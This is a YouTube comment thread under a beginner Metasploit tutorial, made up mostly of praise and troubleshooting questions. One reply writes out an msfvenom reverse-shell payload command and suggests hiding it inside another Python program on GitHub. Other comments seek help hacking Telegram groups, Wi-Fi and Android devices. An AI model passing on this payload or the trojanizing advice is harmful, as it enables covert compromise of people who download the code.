Metasploit For Beginners - Modules, Exploits, Payloads And Shells

Поділитися
Вставка
  • Опубліковано 18 жов 2024

КОМЕНТАРІ • 127

  • @LoiLiangYang
    @LoiLiangYang  4 роки тому +3

    Want to learn all about cyber-security and become an ethical hacker? Join this channel now to gain access into exclusive ethical hacking training videos by clicking this link: ua-cam.com/channels/1szFCBUWXY3ESff8dJjjzw.htmljoin

  • @temudjin1155
    @temudjin1155 3 роки тому +20

    I"m thankful people like you are willing to share their knowledge. Everybody you learn all these techniques

  • @anandkr01
    @anandkr01 4 роки тому +5

    love the way you explain. Pls continue this series. Would like to experience n learn the entire Metasploit series. Awesome

  • @noumanhussain8323
    @noumanhussain8323 2 роки тому +1

    Thank you so much SIR from Pakistan❤

  • @Usertyspr
    @Usertyspr 4 роки тому +1

    This video was helpful..... I'm new on this channel..but I'm following you in each and every video...

  • @albabulhoque4993
    @albabulhoque4993 4 роки тому +4

    Sir, your explanation is great. Thank you for this tutorial. It's really helpful for me.

    • @simran7568
      @simran7568 3 роки тому

      Hi if you are familiar with meta sploit and kali linux id like to talk to u

  • @S0ulxzyy
    @S0ulxzyy 4 роки тому +4

    The best teacher 🤩

  • @holdensanders818
    @holdensanders818 3 роки тому +1

    Subbed finnaly another youtuber making these video that are updated

  • @gaming4life666
    @gaming4life666 4 роки тому +3

    Bro, this was amazing! Keep up the great work! 👍

  • @josekiki1587
    @josekiki1587 3 роки тому +1

    You're a great master at explaining things. I love your voice you make everything supernatural understanding without even question I like it Mr. Loi Liang Yang so super extra teaching I will follow you any minutes you upload the video so so so nice teacher. I will share with the community outside here to know that there is a master outside here who teaches like superman along with clean videos for cybersecurity tutorials.

  • @ZLCProductions
    @ZLCProductions 3 роки тому

    I gotta say very good job and video, watched from start to finish and learned so so much I appreciate you

  • @HusseinAyeni
    @HusseinAyeni Рік тому

    thanks men,you made it easy

  • @jayasimhareddy2303
    @jayasimhareddy2303 4 роки тому +1

    Really loved it. Can you please make whole series of Ethical Hacking tools. Thanks :)

  • @RiceVillatoro
    @RiceVillatoro 5 місяців тому

    Thank you...Master!!!

  • @pranavvedpathak448
    @pranavvedpathak448 3 роки тому +1

    Sir I am ur big fan sir I mean I am ur very very big fan love u sir I watched ur all videos and that was fantastic sir. sir please reply me I am ur big fan ur my idol plz reply

  • @2020mohamed
    @2020mohamed 3 роки тому

    amazing, big like frome EGYPT✌️

  • @eliassal1
    @eliassal1 3 роки тому

    Hi and thanks for this useful session Great talk, learned a lot about the metasexploit feature, can you please tell me where I can find copy of your presentation? Thanks for your efforts

  • @RaviTeja-of2gp
    @RaviTeja-of2gp 4 роки тому

    Awesome tutorial..expecting videos on daily basis.

  • @stevevan2780
    @stevevan2780 3 роки тому

    Dude your a great teacher! Thank you for your videos

  • @dtm7743
    @dtm7743 4 роки тому

    i want to thank you for your great tutorials but i have a question what book do you recommend for beginners to read?

  • @callahangames2368
    @callahangames2368 4 роки тому +1

    Son excelentes tus videos, los explicas muy bien, muchas gracias por tu trabajo, saludos desde México

  • @theazza
    @theazza 3 роки тому

    Well arranged information, thanks.

  • @younessel5165
    @younessel5165 4 роки тому +1

    Hello and thank you for the explanation. Can you please explain why I got the following message: Exploit completed, but no session was created when I run the Exploit??

  • @whoami696
    @whoami696 2 роки тому

    *No Words To Express*

  • @bulmavegeta23
    @bulmavegeta23 4 роки тому

    asesine sir 👍🏼 i can’t wait for more tutorial using metasploit.

  • @niclorenzo2603
    @niclorenzo2603 4 роки тому

    Sir this is a great topic.
    Thank you so much

  • @junaidalam31
    @junaidalam31 Рік тому

    Interesting tutorial

  • @playertv1534
    @playertv1534 4 роки тому

    You are amazing man thanks for the videos

  • @headphonezz69
    @headphonezz69 3 роки тому

    thanks for making this, it's a great video!

  • @bodylyrics5531
    @bodylyrics5531 3 роки тому +1

    you're AWESOME!

  • @funkychimpz5119
    @funkychimpz5119 3 роки тому

    great video thankyou

  • @acooper978
    @acooper978 3 роки тому

    Thanks for the two easy to follow walkthrough! I have a question though, been doing a tutorial with metasploit but when I connect to target computer the connection keeps being killed after a few minutes. Any idea?

  • @jaxaprathiroop1491
    @jaxaprathiroop1491 4 роки тому +1

    Sir please upload ethical Hacking course videos from beginning so that we can learn from basics. Thank you

  • @akaskumar2875
    @akaskumar2875 4 роки тому

    Sir plz 🙏 make a full series on metasploit. Can you give a over view on metasploitable

  • @sankarehamadoun1720
    @sankarehamadoun1720 4 роки тому

    nice content!! Much APPRECIATED

  • @mrethirobot6378
    @mrethirobot6378 4 роки тому +1

    Hi can I use one payload for 2 phones

  • @RaviTeja-of2gp
    @RaviTeja-of2gp 4 роки тому +2

    100K is really less for such good content and explanation.Lets make it 1M🤝

  • @SaMi-se2qs
    @SaMi-se2qs 2 роки тому

    Is it possible to scan an IP outside from local network...?

  • @mant555
    @mant555 2 роки тому

    Do more Metasploit tutorials !!.

  • @saugat55
    @saugat55 4 роки тому

    Nice. Thank you.

  • @Iamjagadeshwaran
    @Iamjagadeshwaran 4 роки тому +1

    Please teach hacks beginning good teaching

  • @FosterMyoThu
    @FosterMyoThu 2 роки тому

    hello sir, I am your student from Udemy. Could you please make tutorial video for Metasploit (PHP-FPM Underflow RCE)?

  • @Usertyspr
    @Usertyspr 4 роки тому +1

    Can you make a tutorial series on wireless hacking.... Methods.... I use laptop but don't have WiFi connection only have mobile data so... Plz make a video on it.. How to attack WiFi without external WiFi adapter

    • @98239
      @98239 4 роки тому +2

      Without external adapters?, your best shot is social engineering, once you're inside their wifi, try getting their PIN its a code that even if they change the Wifi password you have access, check out null byte and do some reading maybe, its kinda easy

    • @Usertyspr
      @Usertyspr 4 роки тому

      @@98239 I've got the WPS pin of that WiFi using Dummer software but when I'm using jumpstart it's not working.... And if come to Linux environments every trick or method use WiFi adapters i mean external WiFi adapters... But I've got only laptop and mobile data(enough data).... In that case what i should do..

    • @Usertyspr
      @Usertyspr 4 роки тому

      Which social engineering methods will be more helpful? I've also got the MAC address... Its a WPS enable connection..

  • @odohidavid4684
    @odohidavid4684 4 роки тому

    Awesome!

  • @Narasi_1404
    @Narasi_1404 4 роки тому

    Windows to create a payload application which is best sir

  • @sanjeevvarkala6918
    @sanjeevvarkala6918 4 роки тому

    Is there a way to enable usb debugging if the android phone is locked.

  • @Yashparwal1
    @Yashparwal1 4 роки тому +1

    sir i am getting an error plzz tell me about this error ............ an smb error login error hac occoured while connecting to the IPC$ tree
    and when using exploit......... Login Failed: connection reset by peer

  • @shamaanpat5998
    @shamaanpat5998 3 роки тому +1

    getting an error : an smb login error occured while connecting to the IPC$ tree. please guide me

  • @henokkassahun7397
    @henokkassahun7397 4 роки тому +1

    Meterpreter session 1 closed. Reason: Died why it's happen
    Can u tell me plz

  • @diplomat1837
    @diplomat1837 4 роки тому

    Please Where can we get the lecture slide?

  • @mytwosatoshis4052
    @mytwosatoshis4052 3 роки тому

    Got my Sub

  • @pumv1629
    @pumv1629 4 роки тому

    Ur close to 100k let's goooo

    • @LoiLiangYang
      @LoiLiangYang  4 роки тому +2

      Let's go!

    • @pumv1629
      @pumv1629 4 роки тому

      @@LoiLiangYang do u have any advice for someone who is starting cybersecurity college

    • @sankarehamadoun1720
      @sankarehamadoun1720 4 роки тому

      @@pumv1629 im trying to get into one. Got some advices?

  • @koffianicetkouakou8599
    @koffianicetkouakou8599 4 роки тому

    Great!

  • @Bluedragon-co4kb
    @Bluedragon-co4kb 4 роки тому +1

    @
    Loi Liang Yang Hi Loi, when i am in Terminal and i show exploits, i cant see the information to the far right of the terminal, even when i am in full screen and zooming in and out? its not showing the rank level of the exploits excellent etc etc

  • @johnjohn7549
    @johnjohn7549 3 роки тому

    This is for beginners?

  • @saschavitt2067
    @saschavitt2067 4 роки тому

    Thank

  • @THEBR0WNGUY
    @THEBR0WNGUY 4 роки тому

    How did you manage the resolution on a vm

  • @milkboysg4595
    @milkboysg4595 4 роки тому +6

    sir is there any way where i can attach a shell to a non metaspoilt(standalone on github) exploit.

    • @milkboysg4595
      @milkboysg4595 4 роки тому

      pls can u make a tutorial on that cos there is a lot of exploit on github but there is no payload attach to it.I read on it.it is something to do with injecting shellcode but i still dont understand it.

    • @lofifridayy
      @lofifridayy 4 роки тому

      @@milkboysg4595 hey , i think you are trying to create a .py payload is simple AF. use this command > msfvenom -p python/meterpreter/reverse_tcp LHOST= HOST LPORT= PORT R > OUTPUTNAME.py You can merge that with another .py programe and upload it to github !

  • @anond5477
    @anond5477 3 роки тому

    Is virtual machine required for this tutorial?

  • @TheGeohart
    @TheGeohart 3 роки тому

    OH MY BUDDHA, THIS IS SO EYEOPENING

  • @faheemkhan9786
    @faheemkhan9786 4 роки тому

    Sir is this full tutorial of metasploit

  • @last_page
    @last_page 4 роки тому

    Hello sir iam a member but cant see a video for member

  • @travellersinghs
    @travellersinghs 4 роки тому

    Do i need a high programming knowledge to be a ethical hacker?

    • @gokselsezginer8507
      @gokselsezginer8507 4 роки тому

      No but knowing python, JavaScript and Ruby will go a long way

  • @Sky-nh5hd
    @Sky-nh5hd 3 роки тому

    Login failed:connection reset by peer!!
    how do u fix that ive disabled firewall and virus protection on target machine and yet!

  • @anubhavsharma1761
    @anubhavsharma1761 4 роки тому

    Why do you not answer any questions related to your videos?

  • @teebest4570
    @teebest4570 3 роки тому

    I get the error 'Connection reset by peer' when I run the scanner......Please can you help with that?

  • @beats5038
    @beats5038 3 роки тому

    Can someone answer this for me, he’s showing that u can gain access to a system without them having to run anything?

  • @Signaturefx01
    @Signaturefx01 4 роки тому

    can you please assit me on how to choose RHOST is it just a random number or there is a way to determine example 4444/ 8080. please help.

    • @scottreynolds3569
      @scottreynolds3569 4 роки тому +1

      rhost is the IP address of your victims machine, 444/8080 are examples of ports not IPs

    • @freidafineday6203
      @freidafineday6203 4 роки тому

      I'm using hackerssummit. com

    • @Signaturefx01
      @Signaturefx01 4 роки тому

      @@freidafineday6203 thank you

  • @sebastianmt02
    @sebastianmt02 3 роки тому

    " ex::Proto::SMB::Exceptions::LoginError: Login Failed: Connection reset by peer
    , do you know what is the problem ?? (this is the Scann result), thank you !!

  • @NuskyAhamed-si2yj
    @NuskyAhamed-si2yj 4 місяці тому

    may i have the presentation slides

  • @Jj-sc5ml
    @Jj-sc5ml 4 роки тому

    Android rat fud series ?? we want

  • @amirahmad1308
    @amirahmad1308 4 роки тому

    he guys i have a problem
    metasploit auto use configured payload when i start use multi/handler
    msf5> use multi/handler
    [*] Using configured payload Android/meterpreter/reverse_tcp
    msf5> exploit(multi/handler) >

  • @eddieweaver7570
    @eddieweaver7570 4 роки тому

    CAN U PLEASE MAKE A VIDEO ON USING (ARMITAGE) WITH METASPLOIT

    • @scottreynolds3569
      @scottreynolds3569 4 роки тому +1

      Armitage is metasploit but just a GUI version

    • @abhijit2231
      @abhijit2231 4 роки тому

      Armitage is good but it doesn't give u the exact results a metasploit cli can give .Better to learn cli. U will notice that Kali 2020 version doesn't have Armitage by default as of 2019 version

    • @nero2k619
      @nero2k619 4 роки тому +1

      Armitage is outdated and no longer supported.

  • @ummahabiba376
    @ummahabiba376 4 роки тому

    How I can join like a member for unlock videos

  • @TheMagnificentArtist
    @TheMagnificentArtist 4 роки тому

    Could you do a video on installing metasploit on virtualbox?

  • @shivampatel442
    @shivampatel442 4 роки тому

    Sir how to use download command in metasploit

    • @abhijit2231
      @abhijit2231 4 роки тому

      Just type download followed by the filename which u want to download

  • @adewalestone3236
    @adewalestone3236 4 роки тому

    How to use metasploit windows

  • @RaviTeja-of2gp
    @RaviTeja-of2gp 4 роки тому +1

    Sir when I click exploit it shows an error saying Rex::connection Refused by remote host.Exploit completed but no session was created.

    • @nero2k619
      @nero2k619 4 роки тому

      1.Firewall is blocking it. 2.Antivirus 3.System is patched. 4.Try using bind shell 5.Stage payload vs non-stage payload.

  • @Bluedragon-co4kb
    @Bluedragon-co4kb 4 роки тому

    @Loi Liang Yang I was trying to virtually remotely execute exploit into my host machine with the vm lol

  • @khan088
    @khan088 4 роки тому

    hey everyone how are you all ?guys can anyone please tell me how to enable or fix copy and paste in kali linux? its not working with me

  • @juozasbetas8900
    @juozasbetas8900 4 роки тому

    Cool
    I cant even take control of my life :DD

  • @Bluedragon-co4kb
    @Bluedragon-co4kb 4 роки тому

    But how to find out IP of target machine outside of my house to target house??

    • @nero2k619
      @nero2k619 4 роки тому

      Use your brain.

    • @esm_47
      @esm_47 3 роки тому

      bro u gotta get into their network and use nmap
      or just ask them

  • @kenmeacham7025
    @kenmeacham7025 2 роки тому

    Don't understand a single thing I need a tutorial for a five day old baby

  • @s.a.z.u7848
    @s.a.z.u7848 4 роки тому

    osm

  • @احمدمحمد-ن6ب6و
    @احمدمحمد-ن6ب6و 4 роки тому

    Hello my name is Osama I'm Egyptian and l need learn hacking android I study python and Java

  • @Franciscolney
    @Franciscolney Рік тому

    ❤❤❤😊

  • @Narasi_1404
    @Narasi_1404 4 роки тому

    Like trojan

  • @mixflix1510
    @mixflix1510 4 роки тому

    How To Hack Telegram Private Group?????

  • @ZipITOfficial
    @ZipITOfficial 4 роки тому

    __________ZIP IT BY MANIMUX______
    Really interested ...

  • @dull5607
    @dull5607 4 роки тому

    没有B站吗,每次看你视频还得翻墙 ! 很麻烦 !还是你的视频最多也只能学学英语

  • @baders6063
    @baders6063 4 роки тому

    1 😎

  • @jkjk12687
    @jkjk12687 3 роки тому

    This guy needs to slow down. I get anxious listening to this guy. Otherwise, good tutorial.

  • @hdclips501
    @hdclips501 3 роки тому

    I have antivirus brother and i can't hack my own computer hahahahahaha i am damn sure nobody can bypass antivirus i don't know does anyone know how to do it i mean bypassing antivirus